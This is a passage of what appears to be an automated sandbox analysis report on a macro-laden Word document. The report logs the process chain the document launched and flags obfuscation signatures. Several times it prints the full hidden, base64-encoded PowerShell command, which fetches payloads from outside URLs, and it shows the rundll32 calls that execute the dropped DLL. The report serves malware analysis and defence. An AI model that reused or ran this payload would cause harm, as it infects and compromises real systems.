nAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cgjbbwbf\qqtudgd.huj',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nkqiqdbodnub\wtlcjwyiszo.kcs',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zersybwlygjod\ujnaefcctevs.wag',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gocmtvldv\plpbjoam.bfk',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uyxqa\ucgv.gdq',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nxixsue\ekwnwx.zgx',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgjjq\jcse.fro',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kggdchrkalohz\pkgboheoanvf.hox',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jhnbwsyvosmob\uzkhbqpbyyqm.xoq',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ulduktzjxplnmpb\xnnmpmxkpltkbl.ghw',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohslgtw\xeprri.cyh',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Adumhgbkvoz\tdxrpdrtbm.quu',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fnniqydokod\xeqkvdqlhe.bce',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wpjypezem\yvgznbmd.qnx',Control_RunDLL
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cgjbbwbf\qqtudgd.huj',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nkqiqdbodnub\wtlcjwyiszo.kcs',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zersybwlygjod\ujnaefcctevs.wag',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gocmtvldv\plpbjoam.bfk',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uyxqa\ucgv.gdq',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nxixsue\ekwnwx.zgx',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgjjq\jcse.fro',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kggdchrkalohz\pkgboheoanvf.hox',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jhnbwsyvosmob\uzkhbqpbyyqm.xoq',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ulduktzjxplnmpb\xnnmpmxkpltkbl.ghw',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohslgtw\xeprri.cyh',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Adumhgbkvoz\tdxrpdrtbm.quu',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fnniqydokod\xeqkvdqlhe.bce',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wpjypezem\yvgznbmd.qnx',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2097585819.0000000002CA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2097585819.0000000002CA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2097585819.0000000002CA7000.00000004.00000040.sdmp
                      Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: powershell.exe, 00000005.00000002.2102091328.0000000003A04000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2103937877.000000001000D000.00000002.00020000.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2097585819.0000000002CA7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2097585819.0000000002CA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2097585819.0000000002CA7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2097388541.0000000002870000.00000002.00000001.sdmp
                      Source: PACK.docInitial sample: OLE summary subject = National JSON parsing Checking Account overriding metrics Shoes Handcrafted Rubber Chair cross-media

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: PACK.docStream path 'Macros/VBA/Oi5oelv0_s4' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Oi5oelv0_s4
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsA
                      PowerShell case anomaly foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgB